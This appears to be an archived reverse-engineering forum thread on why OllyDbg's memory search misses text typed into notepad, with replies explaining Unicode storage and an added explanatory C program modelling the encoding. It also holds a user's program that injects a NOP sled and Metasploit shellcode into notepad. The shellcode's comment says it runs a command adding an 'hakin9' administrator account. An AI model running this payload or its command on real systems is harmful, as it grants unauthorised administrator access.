
View Full Version : String doesn't appear in [Memory map] - why?


Ismaele
October 21st, 2009, 18:35
Good morning,
I'm a newbie.

I ran notepad.exe (under Windows XP, service packed) and wrote some text in the main window.

Next, I opened Olly, attached notepad.exe and refreshed the memory map.
I searched in Olly for the string that I had previously written in the main window of notepad.exe.

Why don't I find it in Olly's memory map? I've searched, but nothing!!!
Can you suggest a solution, please? I'm using OllyDbg 1.10.

Many thanks to all :-)

naides
October 21st, 2009, 19:06
I repeated your exercise: open notepad, write in it "Fucking find me".
Attached Olly.
Let it run.
Pause it.
View Memory.
Search the whole block for "Fucking fi" in ASCII . . .
-> Nothing found
Go back to the beginning of the memory block.
Search "Fucking fi" in UNICODE
-> found the string somewhere in low memory, below 00400000.


Make sure you pay attention to the options, case sensitive or not, whole words or not, and mind that the search engine goes from the cursor location towards the bottom (i.e., higher memory addresses).

Ismaele
October 22nd, 2009, 02:33
Many thanks, mister! :-)
The solution you suggested solved my problem.

But, I ask you, why does Olly behave like this?

Are the steps you described a step-by-step procedure for all string searches in the memory map?

Good morning

Ismaele
October 22nd, 2009, 04:26
Help, now I can't find hexadecimal values in Olly! Why?

I have this C code (compiled under Borland C++ Builder 3):
-------------------------------------------------------------
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    HWND childWindow;           // handle of the child window (notepad's "Edit" control)
    char *buf;
    size_t sled = 1024 * 1024;  // size of the NOP sled placed in front of scode

/* win32_exec - EXITFUNC=process CMD=cmd.exe /c net user hakin9 hakin9 /add && net localgroup administrators /add hakin9 Size=240 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] = "\x33\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
"\x19\xe7\x78\x83\xeb\xfc\xe2\xf4\x35\xf1\xa3\x78\xc9\x19\x6c\x3d"
"\xf5\x92\x9b\x7d\xb1\x18\x08\xf3\x86\x01\x6c\x27\xe9\x18\x0c\x31"
"\x42\x2d\x6c\x79\x27\x28\x27\xe1\x65\x9d\x27\x0c\xce\xd8\x2d\x75"
"\xc8\xdb\x0c\x8c\xf2\x4d\xc3\x7c\xbc\xfc\x6c\x27\xed\x18\x0c\x1e"
"\x42\x15\xac\xf3\x96\x05\xe6\x93\x42\x05\x6c\x79\x22\x90\xbb\x5c"
"\xcd\xda\xd6\xb8\xad\x92\xa7\x48\x4c\xd9\x9f\x74\x42\x59\xeb\xf3"
"\xb9\x05\x4a\xf3\xa1\x11\x0c\x71\x42\x99\x57\x78\xc9\x19\x6c\x10"
"\xf5\x46\xd6\x8e\xa9\x4f\x6e\x80\x4a\xd9\x9c\x28\xa1\x67\x3f\x9a"
"\xba\x71\x7f\x86\x43\x17\xb0\x87\x2e\x7a\x8a\x1c\xe7\x7c\x9f\x1d"
"\xe9\x36\x84\x58\xa7\x7c\x93\x58\xbc\x6a\x82\x0a\xe9\x71\x86\x13"
"\xa0\x77\xde\x58\xa1\x78\x8c\x11\xa7\x20\xc7\x57\xa8\x7d\x83\x58"
"\xef\x3f\xc7\x16\xac\x6d\xc7\x14\xa6\x7a\x86\x14\xae\x6b\x88\x0d"
"\xb9\x39\x86\x1c\xa4\x70\x89\x11\xba\x6d\x95\x19\xbd\x76\x95\x0b"
"\xe9\x36\x86\x1c\xad\x39\x8f\x19\xa2\x70\x89\x41\xc9\x19\xe7\x78";

    childWindow = (HWND)0x8020C;   // hard-coded handle of notepad's Edit control

    if (!childWindow) {
        printf("I didn't find that handle!\n");
        system("PAUSE");
        return 1;
    }
    // make the control writable; EM_SETREADONLY returns nonzero on success
    if (SendMessage(childWindow, EM_SETREADONLY, FALSE, 0) == 0) {
        printf("Sending EM_SETREADONLY to notepad.exe failed!\n");
        system("PAUSE");
        return 1;
    }

    // NOP sled followed by scode, NUL-terminated (modified by me)
    buf = (char *)malloc(strlen((char *)scode) + sled + 1);
    if (!buf) {
        printf("malloc failed!\n");
        system("PAUSE");
        return 1;
    }
    memset(buf, 0x90, sled);
    buf[sled] = '\0';              // terminate the sled so strcat knows where to append
    strcat(buf, (char *)scode);
    // raise the control's text limit so the whole buffer is accepted
    SendMessage(childWindow, EM_SETLIMITTEXT, strlen(buf) + 1, 0);

    if (!SendMessage(childWindow, WM_SETTEXT, 0, (LPARAM)buf)) {
        printf("Sending WM_SETTEXT message failed!\n");
        system("PAUSE");
        free(buf);
        return 1;
    }

    printf("OK!\n");
    system("PAUSE");
    free(buf);
    return 0;
}
-----------------------------------------------------------------

My program runs very well; it actually writes the scode[] array into the "Edit" control of notepad.exe, but I didn't find the values "\x33\xc9\x83\xe9" in the [Memory map] of OllyDbg.

Why? I also tried to search for the value '33C983E9' like you suggested. But nothing!

Instead of the scode[] array, if I write some normal chars (like 'try' or 'testtesttest' or 'computercomputercomputer') in the 'Edit' control of notepad.exe, I do find them in the memory map.

I don't understand :-(

naides
October 22nd, 2009, 08:15
Quote:
[Originally Posted by Ismaele;83406]
But, I ask you, why does Olly behave like this?

This is not a behavior of Olly. Olly is obediently finding what we are asking for. It is a behavior of Notepad: it is storing its strings in Unicode format. Ever since Windows XP, Windows uses Unicode to manipulate all strings in order to handle all the written alphabets on the planet, including Chinese.

Are the steps you described a step-by-step procedure for all string searches in the memory map?

You may say so. You cannot predict what format a given program will use to store a given item in memory: it may use ASCII, it may use UNICODE, it may use some proprietary encoding, or the program may even encrypt the strings to prevent us from locating them . . .


Good morning



naides
October 22nd, 2009, 08:41
The string is there in Unicode: you will not find the hex 33C983 . . ., which is the translation of \x33\xc9\x83 . . . to its raw-byte equivalent. Only after the C compiler interprets \x33\xc9\x83 during compilation is it translated to hex bytes and loaded into memory, when you run the compiled program itself, not the high-level C code text you wrote in the Edit control of Notepad.
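Added example, not code from the thread and not written by either poster. It models the point behind both of naides' answers: notepad's Edit control on XP is a Unicode window, so whatever reaches it as an 8-bit string, whether typed at the keyboard or pushed in with SendMessage(WM_SETTEXT) from a non-Unicode build such as the posted Borland program (assumed to be compiled without UNICODE, so SendMessage is the ANSI variant), is kept as UTF-16LE. The code assumes the system ANSI code page is Windows-1252 (its table is embedded so nothing needs windows.h), converts a string the way that ANSI-to-Unicode step does, builds a constructed stand-in for a piece of notepad's heap, and runs the plain byte search that OllyDbg's memory search performs. The names ansi_to_utf16le, find_bytes, build_fake_heap, search_ascii, search_unicode and stored_hex are this example's own. It shows that an ASCII search for the typed text misses while the UNICODE search hits, and that the shellcode prefix \x33\xc9\x83\xe9 from the posted program is stored as 33 00 C9 00 92 01 E9 00, so neither the raw hex 33C983E9 nor an ASCII search can find it; stored_hex prints the byte pattern that would have to be searched for instead.

```c
/* Added example, not from the thread.  Models how a Unicode edit control
 * stores text handed to it as an 8-bit (ANSI) string, and reproduces the
 * ASCII-vs-UNICODE search results seen in OllyDbg.
 * ASSUMPTION: the system ANSI code page is Windows-1252; its table is
 * embedded here so the program runs anywhere without windows.h. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Windows-1252 code points for bytes 0x80..0x9F, the only range where the
 * code page differs from ISO-8859-1.  Undefined bytes (0x81, 0x8D, 0x8F,
 * 0x90, 0x9D) map to the same-numbered C1 control, as the Windows table does. */
static const uint16_t cp1252_high[32] = {
    0x20AC, 0x0081, 0x201A, 0x0192, 0x201E, 0x2026, 0x2020, 0x2021,
    0x02C6, 0x2030, 0x0160, 0x2039, 0x0152, 0x008D, 0x017D, 0x008F,
    0x0090, 0x2018, 0x2019, 0x201C, 0x201D, 0x2022, 0x2013, 0x2014,
    0x02DC, 0x2122, 0x0161, 0x203A, 0x0153, 0x009D, 0x017E, 0x0178
};

/* Convert n ANSI bytes to UTF-16LE (2*n bytes written to out): the
 * conversion an ANSI WM_SETTEXT goes through before a Unicode window sees
 * it, and the form in which the edit control keeps typed text. */
size_t ansi_to_utf16le(const unsigned char *in, size_t n, unsigned char *out)
{
    size_t i;
    for (i = 0; i < n; i++) {
        uint16_t cp = in[i];
        if (cp >= 0x80 && cp <= 0x9F)
            cp = cp1252_high[cp - 0x80];
        out[2 * i]     = (unsigned char)(cp & 0xFF);   /* low byte first */
        out[2 * i + 1] = (unsigned char)(cp >> 8);
    }
    return 2 * n;
}

/* Byte-string search over a memory block, as Olly's memory search does from
 * the cursor towards higher addresses.  Returns the offset or -1. */
long find_bytes(const unsigned char *hay, size_t hlen,
                const unsigned char *needle, size_t nlen)
{
    size_t i;
    if (nlen == 0 || nlen > hlen)
        return -1;
    for (i = 0; i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0)
            return (long)i;
    return -1;
}

#define FILLER   64     /* bytes of junk on each side of the text */
#define MAX_TEXT 256    /* longest input the fake heap block accepts */

/* Constructed stand-in for a piece of notepad's heap: filler, then the text
 * as the Unicode edit control stores it, then filler.  Returns block size. */
size_t build_fake_heap(const unsigned char *text, size_t n, unsigned char *heap)
{
    size_t w;
    memset(heap, 0xAA, FILLER);
    w = ansi_to_utf16le(text, n, heap + FILLER);
    memset(heap + FILLER + w, 0xAA, FILLER);
    return FILLER + w + FILLER;
}

/* Offset of an ASCII (raw 8-bit) search for text in the modelled block, -1 on miss. */
long search_ascii(const unsigned char *text, size_t n)
{
    unsigned char heap[FILLER + 2 * MAX_TEXT + FILLER];
    size_t hl;
    if (n > MAX_TEXT) return -1;
    hl = build_fake_heap(text, n, heap);
    return find_bytes(heap, hl, text, n);
}

/* Same block, but searching for the UTF-16LE form (Olly's UNICODE search). */
long search_unicode(const unsigned char *text, size_t n)
{
    unsigned char heap[FILLER + 2 * MAX_TEXT + FILLER];
    unsigned char pat[2 * MAX_TEXT];
    size_t hl, pl;
    if (n > MAX_TEXT) return -1;
    hl = build_fake_heap(text, n, heap);
    pl = ansi_to_utf16le(text, n, pat);
    return find_bytes(heap, hl, pat, pl);
}

/* Hex dump of what the control stores for text, i.e. the bytes to search for. */
const char *stored_hex(const unsigned char *text, size_t n)
{
    static char hex[4 * MAX_TEXT + 1];
    unsigned char pat[2 * MAX_TEXT];
    size_t pl, i;
    if (n > MAX_TEXT) return "";
    pl = ansi_to_utf16le(text, n, pat);
    for (i = 0; i < pl; i++)
        sprintf(hex + 2 * i, "%02X", pat[i]);
    return hex;
}

int main(void)
{
    const unsigned char typed[] = "find me";            /* constructed: text typed into notepad */
    const unsigned char scode[] = "\x33\xc9\x83\xe9";   /* first bytes of the posted shellcode */
    printf("typed: ASCII search -> %ld, UNICODE search -> %ld\n",
           search_ascii(typed, 7), search_unicode(typed, 7));
    printf("scode: raw 33C983E9 -> %ld, stored as %s -> %ld\n",
           search_ascii(scode, 4), stored_hex(scode, 4), search_unicode(scode, 4));
    return 0;
}
```

Bytes 0x80-0x9F are the ones that change shape the most: 0x83 becomes U+0192 (bytes 92 01), so even a UNICODE search for the original shellcode characters will not match unless the pattern is built from the code-page conversion rather than by inserting zero bytes. On a machine whose ANSI code page is not 1252 the high bytes map differently, which is why the code page is stated as an assumption.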